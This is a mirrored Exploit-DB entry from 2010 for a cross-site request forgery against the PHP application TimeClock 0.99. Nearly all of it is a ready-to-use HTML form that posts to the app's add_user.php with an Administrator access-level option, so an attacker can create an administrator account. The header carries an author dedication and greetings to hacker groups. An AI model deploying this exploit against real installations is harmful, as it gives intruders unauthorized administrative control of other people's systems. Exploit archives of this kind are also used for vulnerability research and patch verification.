Lucene search

K
exploitdbViRuSMaNEDB-ID:11516
HistoryFeb 20, 2010 - 12:00 a.m.

TimeClock 0.99 - Cross-Site Request Forgery (Add Admin)

2010-02-2000:00:00
ViRuSMaN
www.exploit-db.com
231

AI Score

7.4

Confidence

Low

==============================================================================
        [ยป] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
        [ยป] TimeClock Remote Add Admin Exploit
==============================================================================

    [ยป] Script:             [ TimeClock ]
    [ยป] Language:           [ PHP ]
    [ยป] Site page:          [ timeclock-software is a free open-source application released under the GP. ]
    [ยป] Download:           [ http://www.hormiga.org/zonamac/descargas/timeclock-software.zip ]
    [ยป] Founder:            [ ViRuSMaN <[email protected] - [email protected]> ]
    [ยป] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & Pentestlabs.Com ]
    [ยป] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

<html>
<head>
<title>TimeClock Remote Add Admin Exploit[By:MvM]</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>

<form method="post" action="http://localhost/scripts/add_user.php">
<table border="1">
<tr>
<td align="center"><b>Adding User</b></td>
</tr>
<tr>
<td>
<table>
<tr>
<td align="right">First Name:&nbsp;</td><td align="left"><input type="text" name="fname" size="30"></td>
</tr>
<tr>
<td align="right">Last Name:&nbsp;</td><td align="left"><input type="text" name="lname" size="30"></td>
</tr>
<tr>
<td align="right">Access Level:&nbsp;</td>
<td>
<select name="access_level">
<option value="Administrator">Administrator</option>
<option value="User">User</option>
</select>
</td>
</tr>
<tr>
<td align="right">Username:&nbsp;</td><td align="left"><input type="text" name="u_name" size="30"></td>
</tr>
<tr>
<td align="right">Password:&nbsp;</td><td align="left"><input type="text" name="user_password" size="30"></td>
</tr>
<tr>
<td>&nbsp;</td><td><input type="submit" name="submit" value="Add" class="button">&nbsp;<input type="submit" name="cancel" value="Cancel" class="button"></td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</body>
</html>

Author: ViRuSMaN <-

###########################################################################

AI Score

7.4

Confidence

Low

Related for EDB-ID:11516